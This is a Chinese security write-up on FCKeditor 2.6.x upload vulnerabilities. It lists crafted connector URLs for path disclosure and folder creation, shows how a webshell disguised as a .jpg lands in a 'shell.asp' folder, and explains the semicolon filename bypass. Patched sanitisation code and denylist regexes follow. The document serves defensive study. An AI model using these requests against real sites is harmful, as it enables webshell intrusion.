Fckeditor PHP/ASP File Upload Vul
目录
. 漏洞描述
. 漏洞触发条件
. 漏洞影响范围
. 漏洞代码分析
. 防御方法
. 攻防思考
1. 漏洞描述
FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多WEB项目和大型网站均采用了FCKeditor
它可和PHP、JavaScript、ASP、ASP.NET、ColdFusion、Java、以及ABAP等不同的编程语言相结合
FCK中一个很重要的文件上传的功能,常常被黑客用来进行GETSHELL攻击,根本原因是因为角色权限控制不严、以及文件扩展名限制逻辑存在BYPASS缺陷
Relevant Link:
http://sebug.net/vuldb/ssvid-20830
2. 漏洞触发条件
0x1: 信息搜集
首先收集FCK的版本信息
http://localhost/fckeditor/editor/dialog/fck_about.html
/*
version
2.6.8
Build 25427
*/
0x2: 获取上传点路径
爆物理路径
http://172.31.200.74/editor/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp . 爆路径漏洞
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp . 列目录漏洞也可助找上传地址
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F . 其他上传地址
http://192.168.174.138/fckeditor/_samples/default.html
http://192.168.174.138/fckeditor/_samples/asp/sample01.asp
http://192.168.174.138/fckeditor/_samples/asp/sample02.asp
http://192.168.174.138/fckeditor/_samples/asp/sample03.asp
http://192.168.174.138/fckeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples目录,可以试试。
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页
http://192.168.174.138/fckeditor/editor/fckeditor.html . 常用上传地址
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php . FCKeditor 中test 文件的上传地址
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/test.html
http://192.168.174.138/fckeditor/editor/filemanager/upload/test.html
http://192.168.174.138/fckeditor/editor/filemanager/connectors/test.html
http://192.168.174.138/fckeditor/editor/filemanager/connectors/uploadtest.html
最终获得的上传点如下
http://localhost/fckeditor/editor/filemanager/connectors/test.html
http://localhost/fckeditor/editor/filemanager/connectors/uploadtest.html
0x3: 建立新文件夹
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
//在images文件夹下建立文件夹
0x4: IIS解析漏洞
如果你的文件处在一个xx.asp文件夹下,那这个文件夹下的所有文件都会被当作.asp脚本来执行,这是利用了IIS的xx.asp文件夹解析漏洞
. 建立一个文件夹/z/shell.asp
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
http://localhost/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp . 上传一个内容为WEBSHELL的xx.jpg文件
http://localhost/userfiles/image/shell.asp/z/choop.jpg
http://localhost/userfiles/image/shell.asp/z/choop.jpg
//这个xx.jpg会被当作webshell解析
0x5: FCK扩展名过滤防御解析漏洞
正常情况下,fck对上传的文件后缀扩展名是有防御逻辑的(即禁止上传脚本文件)
. 上传文件名: shell.php;.jpg
文件会被重命名为: shell_php.jpg . 如果上传文件名:
) a.php;a_jpg
) a.asp;a_jpg
则文件不会被重命名 . 又因为IIS存在一个解析漏洞,分号";"后面的字符串会被IIS截断,导致黑客上传的文件对IIS来说就是
a.php
a.asp
从而得到执行
Relevant Link:
http://hi.baidu.com/holyli/item/f2d37959513ed509e6c4a597
3. 漏洞影响范围
2.6.xx
4. 漏洞代码分析
FCKEditor上传检测,是通过黑色单/白名单的方式检测允许和不允许上传的文件类型,具体的实现逻辑位于
. asp: \editor\filemanager\connectors\asp\io.asp
. php: \editor\filemanager\connectors\php\io.php
//在另一个browser目录中也存在同样目录结构的一套文件
. asp: \editor\filemanager\browser\default\connectors\asp\io.asp
. php: \editor\filemanager\browser\default\connectors\php\io.php
0x1: ASP
\fckeditor\editor\filemanager\connectors\asp\class_upload.asp
Private Function IsAllowed(sExt)
Dim oRE
Set oRE = New RegExp
oRE.IgnoreCase = True
oRE.Global = True If sDenied = "" Then
oRE.Pattern = sAllowed
IsAllowed = (sAllowed = "") Or oRE.Test(sExt)
Else
oRE.Pattern = sDenied
IsAllowed = Not oRE.Test(sExt)
End If Set oRE = Nothing
End Function
\fckeditor\editor\filemanager\connectors\asp\io.asp
Function IsAllowedExt( extension, resourceType )
Dim oRE
Set oRE = New RegExp
oRE.IgnoreCase = True
oRE.Global = True Dim sAllowed, sDenied
sAllowed = ConfigAllowedExtensions.Item( resourceType )
sDenied = ConfigDeniedExtensions.Item( resourceType ) IsAllowedExt = True If sDenied <> "" Then
oRE.Pattern = sDenied
IsAllowedExt = Not oRE.Test( extension )
End If If IsAllowedExt And sAllowed <> "" Then
oRE.Pattern = sAllowed
IsAllowedExt = oRE.Test( extension )
End If Set oRE = Nothing
End Function
待检测的extension是来自FCK的配置文件:config.asp
\fckeditor\editor\filemanager\connectors\asp\config.asp
ConfigAllowedExtensions.Add "File", "7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|png|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf|sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|xml|zip" ConfigAllowedExtensions.Add "Image", "bmp|gif|jpeg|jpg|png" ConfigAllowedExtensions.Add "Flash", "swf|flv" ConfigAllowedExtensions.Add "Media", "aiff|asf|avi|bmp|fla|flv|gif|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|png|qt|ram|rm|rmi|rmvb|swf|tif|tiff|wav|wma|wmv"
这只是提供给FCK的正则判断逻辑,真正的重命名机制在这里
\fckeditor\editor\filemanager\connectors\asp\io.asp
' Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( sNewFileName )
Dim oRegex
Set oRegex = New RegExp
oRegex.Global = True if ( ConfigForceSingleExtension = True ) then
/*
这就是重命名文件名的关键逻辑了
从第一个遇到"."号开始搜索,并把后面的内容当作捕获分组,捕获分组的过滤条件是不会再在后面遇到一个"."号 了,并设置一个断言,断言的内容为捕获分组的内容不可能发生,即如果还在后面遇到了一个"."号,则这个正则判断成立,即搜索到第一次遇到的"."号。然后进行replace操作,把"."号替换成"_"
1. 如果我们的文件名是: asp.asp;asp.jpg,自然会被正则捕获到,第一个"."号就被替换成了"_"
2. 如果我们的文件名是: asp.asp;jpg,这种文件名也能通过文件后缀判断逻辑,即bypass
*/
oRegex.Pattern = "\.(?![^.]*$)"
sNewFileName = oRegex.Replace( sNewFileName, "_" )
end if ' remove \ / | : ? * " < > and control characters
oRegex.Pattern = "(\\|\/|\||:|\?|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
SanitizeFileName = oRegex.Replace( sNewFileName, "_" ) Set oRegex = Nothing
end function
5. 防御方法
1. ASP
0x1: 删除fckeditor下含test的html文件
. \editor\filemanager\connectors\test.html
0x2: 在代码层防御IIS解析漏洞(分号截断)
\editor\filemanager\connectors\asp\io.asp
' Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( sNewFileName )
Dim oRegex
Dim oRegexSecurityExt
Set oRegex = New RegExp
Set oRegexSecurityExt = New RegExp
oRegex.Global = True
oRegexSecurityExt.Global = True if ( ConfigForceSingleExtension = True ) then
oRegex.Pattern = "\.(?![^.]*$)"
SanitizeFileName = oRegex.Replace( sNewFileName, "_" ) oRegexSecurityExt.Pattern = "\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)"
SanitizeFileName = oRegexSecurityExt.Replace( sNewFileName, "_" )
end if ' remove \ / | : ? * " < > and control characters
oRegex.Pattern = "(\\|\/|\||:|\;|\?|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
SanitizeFileName = oRegex.Replace( sNewFileName, "_" ) Set oRegex = Nothing
end function
0x3: 在代码层防御IIS解析漏洞(创建xx.asp目录)
如果黑客通过FCK的目录创建接口创建了一个xx.asp目录,IIS将此目录下的的任意文件都当作asp脚本进行解析,攻击者可以向这个目录下上传包含WEBSHELL的jpg文件
' Do a cleanup of the folder name to avoid possible problems
function SanitizeFolderName( sNewFolderName )
Dim oRegex
Dim oRegexSecurityExt
Set oRegex = New RegExp
Set oRegexSecurityExt = New RegExp
oRegex.Global = True
oRegexSecurityExt.Global = True 'remove . \ / | : ? * " < > and control characters
oRegex.Pattern = "(\.|\\|\/|\||:|\?|\;|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
SanitizeFolderName = oRegex.Replace( sNewFolderName, "_" ) 'forbidden the dangerous ext
oRegexSecurityExt.Pattern = "\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$"
SanitizeFolderName = oRegexSecurityExt.Replace( sNewFolderName, "_" ) Set oRegex = Nothing
end function
0x4: 扩展名上传限制正则绕过漏洞
和0x2: 在代码层防御IIS解析漏洞(分号截断)相同,同时还可以通过强化正则规则,在扩展名的头尾加上"起始"、"结束"定界符来规避攻击者的畸形后缀bypass
Function IsAllowedType( resourceType )
Dim oRE
Set oRE = New RegExp
oRE.IgnoreCase = False
oRE.Global = True
oRE.Pattern = "^(" & ConfigAllowedTypes & ")$" IsAllowedType = oRE.Test( resourceType ) Set oRE = Nothing
End Function Function IsAllowedCommand( sCommand )
Dim oRE
Set oRE = New RegExp
oRE.IgnoreCase = True
oRE.Global = True
oRE.Pattern = "^(" & ConfigAllowedCommands & ")$" IsAllowedCommand = oRE.Test( sCommand ) Set oRE = Nothing
End Function
Relevant Link:
http://www.chinaz.com/news/2012/1205/284700.shtml
http://www.sdlunzhong.cn/itres/showitnews.aspx?id=807
2. PHP
存在IIS+FastCGI即同时存在ASP、PHP的运行环境
/editor/filemanager/connectors/php/io.php
// Do a cleanup of the folder name to avoid possible problems
function SanitizeFolderName( $sNewFolderName )
{
$sNewFolderName = stripslashes( $sNewFolderName ) ; // Remove . \ / | : ; . ? * " < >
$sNewFolderName = preg_replace( '/\\.|\\\\|\\;|\\/|\\||\\:|\\?|\\*|"|<|>|[[:cntrl:]]/', '_', $sNewFolderName ) ; $sNewFolderName = preg_replace( '/\\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$/i', '_', $sNewFolderName ) ; return $sNewFolderName ;
} // Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( $sNewFileName )
{
global $Config ; $sNewFileName = stripslashes( $sNewFileName ) ; // Replace dots in the name with underscores (only one dot can be there... security issue).
if ( $Config['ForceSingleExtension'] )
$sNewFileName = preg_replace( '/\\.(?![^.]*$)/', '_', $sNewFileName ) ; // Remove \ / | : ? * " < >
$sNewFileName = preg_replace( '/\\\\|\\/|\\||\\:|\\;|\\?|\\*|"|<|>|[[:cntrl:]]/', '_', $sNewFileName ) ; $sNewFileName = preg_replace( '/\\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)/i', '_', $sNewFileName ) ; return $sNewFileName ;
}
6. 攻防思考
Copyright (c) 2014 LittleHann All rights reserved
Fckeditor PHP/ASP File Upload Vul的更多相关文章
- FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul
catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://www.wooyun.org ...
- File upload in ASP.NET Core web API
参考1:File upload in ASP.NET Core web API https://www.janaks.com.np/file-upload-asp-net-core-web-api/ ...
- jquery file upload + asp.net 异步多文件上传
百度了很久,国内一直 找不到 使用jquery file upload 插件 +asp.net 的相关代码 一开始使用 jquery uploadify ,一款基于 flash的插件,但是不支持 Sa ...
- 上传文件 file upload 学习笔记
这里我只会说说一些完成 file upload 的基础 API. 很多项目我们需要上传文件. 有简单的 input file, 有需要验证的,有需要压缩的(img),有需要分段的(video),有需要 ...
- JQuery File Upload 插件 出现 “empty file upload result” 错误的解决方案。
本例中采用的是 JQuery File Upload + ASP.NET 的方式, Google了大半天基本没有找到合理的解决方案,倒是在 NodeJS的一遍博客中找到了灵感:http://www.i ...
- RFC1867 HTTP file upload
RFC1867 HTTP file upload RFC1867 is the standard definition of that "Browse..." button tha ...
- Pikachu-File Inclusion, Unsafe file download & Unsafe file upload
Pikachu-File Inclusion, Unsafe file download & Unsafe file upload 文件包含漏洞 File Inclusion(文件包含漏洞)概 ...
- jQuery File Upload 单页面多实例的实现
jQuery File Upload 的 GitHub 地址:https://github.com/blueimp/jQuery-File-Upload 插件描述:jQuery File Upload ...
- jQuery File Upload done函数没有返回
最近在使用jQuery File Upload 上传图片时发现一个问题,发现done函数没有callback,经过一番折腾,找到问题原因,是由于dataType: ‘json’造成的,改为autoUp ...
随机推荐
- NET代码重构
记一次.NET代码重构 好久没写代码了,终于好不容易接到了开发任务,一看时间还挺充足的,我就慢慢整吧,若是遇上赶进度,基本上直接是功能优先,完全不考虑设计.你可以认为我完全没有追求,当身后有鞭子使 ...
- linux:手动校准系统时间和硬件CMOS时间
windows下OS时间和主板CMOS芯片里的时间通常是一致的,但是linux却不一定,在无法联网自动校准时间的情况下,只能手动调整: 查看系统时间 date 调整系统时间 sudo date -s ...
- Ubuntu环境下安装TinyOS系统
1.输入下面命令会弹出source list窗口 1 sudo gedit /etc.apt/sources.list 在尾部添加以下地址: 1 2 deb http://tinyos.sta ...
- Theano2.1.10-基础知识之循环
来自:http://deeplearning.net/software/theano/tutorial/loop.html loop 一.Scan 一个递归的通常的形式,可以用来作为循环语句. 约间和 ...
- Theano3.5-练习之深度卷积网络
来源:http://deeplearning.net/tutorial/lenet.html#lenet Convolutional Neural Networks (LeNet) note:这部分假 ...
- 45个JavaScript小技巧
原文地址 http://modernweb.com/2013/12/23/45-useful-javascript-tips-tricks-and-best-practices/ 这篇文章的质量个人感 ...
- C#微信开发小白成长教程一(公众平台的工作原理与调试环境部署,附视频)
黑夜给了我黑色的眼睛,我决定录视频到天明.半年前的现在,我还在苦逼着加着班,半年后的今天我依旧苦逼着加着班.不过现在的是为自己加班,作为一个资深程序小白,一个月前我光荣的成了一个不称职的资本家,不称职 ...
- Java关键字this、super使用总结
版权声明:原创作品,如需转载,请与作者联系.否则将追究法律责任. 作者:熔岩日期:2007-03-01MSN :leizhimin@126.com声明:原创作品,未经授权,谢绝转载! 好久没有对所学知 ...
- Android开发之Menu和actionBar
一.通过Menu目录下创建一个布局文件: 先看代码meu/main.xml: <?xml version="1.0" encoding="utf-8"?& ...
- Dll的显式和隐式调用
建立项目,请选择Win32 控制台项目(Win32 Console Application),选择DLL和空项目选项.DLLs可能并不如你想像的那样难.首先写你的头文件(header file):称为 ...